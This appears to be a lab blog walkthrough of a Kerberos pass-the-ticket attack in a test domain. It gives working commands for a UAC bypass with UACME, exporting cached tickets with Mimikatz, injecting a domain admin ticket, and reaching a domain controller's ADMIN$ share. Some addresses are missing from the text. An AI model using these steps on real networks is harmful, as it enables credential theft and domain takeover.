Pass-The-Ticket (PTT) attack in Mimikatz (and a Gotcha!)

3 min readAug 17, 2017



Pass-the-ticket attack is a well-known method of impersonating users on an AD domain. AD typically users Kerberos to provides single sign-on and SSO.

Basically, a workstation/device in AD authenticates to a domain controller by requesting a TGT ticket for itself. The TGT ticket is valid for a period of time (typically hours) and is used to request more tickets.

Here was my setup for the domain HACKER.TESTLAB:

win7pc ( — — — — win2012dc (

The setup consisted of the following users:

  • win7user — Local Admin user on windows 7 client in HACKER.TESTLAB domain
  • Administrator — Domain admin in HACKER.TESTLAB domain
* win7user - admin user on windows 7 client
* Administrator - domain admin in HACKER.TESTLAB

win7user is already logged into win7pc, which is in the domain HACKER.TESTLAB. We will be using mimikatz to perform the PTT attack.

Steps Performed

  • User HACKER.TESTLAB\win7user needs to escalate his privileges on win7pc to bypass UAC. Otherwise, mimikatz’s minimum requirement of user having “Debug Privileges” cannot be met. First, we utilize UACME to bypass UAC protection and get “Debug Privileges” and “High Integrity”. We can use “whoami /all” to check current privileges and the integrity level.
> whoami /all
Privilege Name
> Akagi64.exe 1
> whoami/all
Privilege Name

Note: A new command prompt with elevated integrity level (uac bypassed) is opened by UACMe. If using Metasploit meterpreter, then multiple bypassuac exploits are available, which open a new meterpreter session with higher integrity levels.

  • We will get a list of all existing kerberos tickets. Typically, we see none.
Cached Tickets: (0)
  • We will utilise mimikatz.exe to get all the kerberos tickets. The following commands will export all kerberos tickets into the folder from which mimikatz.exe was started. From the .kirbi file names, we will be able to see if there are any Kerberos tickets for domain admin HACKER.TESTLAB\Administrator. We really care about “krbtgt” tickets, as they grant us access to multiple services.

Note: KrbTGT tickets get cached ONLY IF HACKER.TESTLAB\Administrator has logged on to win7pc before.

> mimikatz.exe
# privilege::debug
# sekurlsa::tickets /export
> exit
> dir | findet "Administrator" | findstr "krbtgt"
  • We can now reuse one of the cached tickets to get Domain Admin in the current user session aka HACKER.TESTLAB\win7user.
> mimikatz.exe
# privilege::debug
# kerberos::ptt [0;1d0bb]-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi
File: '[0;1d0bb]-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi': OK
# exit
  • So far so good… we can now check the output of klist and see cached tickets.
> klist | findstr "Cached"
Cached Tickets: (1)

Gotcha! Problem Encountered

  • Now when we try to access the admin$ directory on a domain controller as a test, we simply get “Access is Denied”!
> dir \\\admin$
Access is Denied.


To resolve this, you must use the hostname of the DC! This can be determined as follows:

> nltest /dc:HACKER.TESTLAB
win2012dc.HACKER.TESTLAB [PDC] [DS] Default-Site: Your-First-Site

Repeating the command with the domain name of the DC gives us access to the ADMIN$ directory.

> dir \\win2012dc.hacker.testlab\admin$
07/28/2017 05:32 AM <DIR> .
07/28/2017 05:32 AM <DIR> ..
08/23/2013 01:39 AM <DIR> ADFS
07/28/2017 05:27 AM <DIR> ADWS


